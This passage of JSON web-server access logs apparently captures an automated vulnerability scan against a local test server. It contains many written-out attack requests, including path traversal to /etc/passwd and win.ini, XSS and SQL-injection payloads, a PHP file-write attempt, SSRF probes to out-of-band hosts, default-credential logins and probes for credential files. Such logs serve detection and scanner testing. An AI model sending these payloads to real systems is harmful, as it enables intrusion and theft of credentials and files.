Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/63 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"@\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_bulk HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system-diagnostics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"--871a4a346a547cf05cb83f57b9ebcb83\x0D\x0AContent-Disposition: form-data; name=\x22files\x22; filename=\x22test.tar\x22\x0D\x0A\x0D\x0A../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000297MTnnWccGtjHWXQrKiqcMJnLx\x0D\x0A--871a4a346a547cf05cb83f57b9ebcb83--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/UploadServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.220","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/64 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Administrator\x0D\x0A Administrator\x0D\x0A bi\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlpserver/services/XMLPService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nifi-api/access/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cdn-cgi/image/width/https://c9v8h88smpv8c1ig07h07wyzadt5sjer5.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vpn/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.213","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin%202/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/data/autosuggest-remote.php?q=\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/65 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.228","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/66 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.221","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup2.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/67 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=297MTwHjBuvSHAHpxUK1eDMotex.php&target=l1_Lw HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://c9v8h8gsmpv8c1qg07h0kazw1hw8sf63r.oast.fun%23.salesforce.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/68 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22297MTvhr6J9C1ZoeRkP90tSVk6g%22%3b%20%3f%3e","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/69 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /product-downloads/297MTwHjBuvSHAHpxUK1eDMotex.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/70 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.dbeaver/credentials-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22admin@local.host\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.006","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/71 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all_dbs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hp/device/DeviceInformation/View HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.217","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/components/suggestions?recentlyBrowsed= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"{\x22name\x22:\x22admin\x22,\x22password\x22:\x22admin\x22,\x22checkbox\x22:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/system HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd 